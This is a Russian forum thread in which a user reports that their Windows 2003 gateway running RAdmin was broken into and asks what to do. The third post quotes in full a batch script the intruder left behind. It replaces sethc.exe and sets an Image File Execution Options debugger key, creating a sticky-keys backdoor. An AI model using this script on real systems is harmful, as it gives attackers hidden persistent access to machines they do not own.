![]() |
|
| Правила Форума редакция от 22.06.2020 |
|
|||||||
|
|
Окажите посильную поддержку, мы очень надеемся на вас. Реквизиты для переводов ниже. |
|
![]() |
|
|
Опции темы | Опции просмотра |
Language
|
|
|
#1
|
|
Пользователь
Пол:
Регистрация: 14.03.2008
Сообщений: 95
Репутация: 7
|
Есть комп работает как маршрутизатор - раздает инет.
Windows 2003, UserGate 2.8, RAdmin 2.1. Tiny Personal Firewall 4.0 включена только наполовину(трафик не фильтруется), так как непонятно почему режет нужный трафик. На днях появился в RAdmin Current connections неизвестный(не наш) ай-пи в режиме передачи файлов, поменял пароль на RAdmin и перезапустил сеть(чтобы соединение отрубилось). Мог ли кто-нибудь перехватить сетевые пакеты RAdmin и узнать пароль? |
|
|
|
| Реклама: | темный демон будет ли 2 сезон | лестница для барнхаус | 3д моделирование | шлифстанки ювелирные | Магазин бытовой техники: ec685.m - переходи на сайт ТАЙМТВ! |
|
|
#2
|
|
Ветеран
![]() ![]() ![]() ![]() ![]() Пол:
Регистрация: 09.12.2007
Сообщений: 2,544
Репутация: 939
|
http://bugtraq.ru/rsn/archive/2004/02/28.html, или вот ещё, например:
http://forum.antichat.ru/threadnav13658-1-10.html можешь и и сам погуглить по словам "взлом Radmin"
__________________
Доброе слово и кошке приятно... Последний раз редактировалось Vose; 15.08.2009 в 22:13.. |
|
|
|
|
|
#3
|
|
Пользователь
Пол:
Регистрация: 14.03.2008
Сообщений: 95
Репутация: 7
|
у меня по ходу серевр инета взломали
щас проверяю антивирусом cureit нашло заразу у нового пользователя windows first в каталоге пользователя first лежит батник 1.bat и файл 222.exe текст батника: copy 222.exe %systemroot%\system32\dllcache\sethc.exe & copy 222.exe %systemroot%\system32\sethc.exe & copy 222.exe %systemroot%\Cluster\222.exe echo Windows Registry Editor Version 5.00 >1.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] >>1.reg echo "debugger"="c:\\windows\\Cluster\\222.exe" >>1.reg regedit /s 1.reg del 1.reg а также в каталоге пользователя C:\Documents and Settings\First\ rad.exe (Program.RemoteAdmin Контейнер содержит инфицированные объекты) - cureit его переместил Что теперь делать? Проверяю щас на вирусы, буду ставить файрвол Outpost, также ищу антивирус помоднее... |
|
|
|
![]() |
Похожие темы
|
||||
| Тема | Автор | Раздел | Ответов | Последнее сообщение |
| Безопасен ли vpn сервер? | Cjing | Скорая помощь | 10 | 11.08.2009 23:15 |
|
|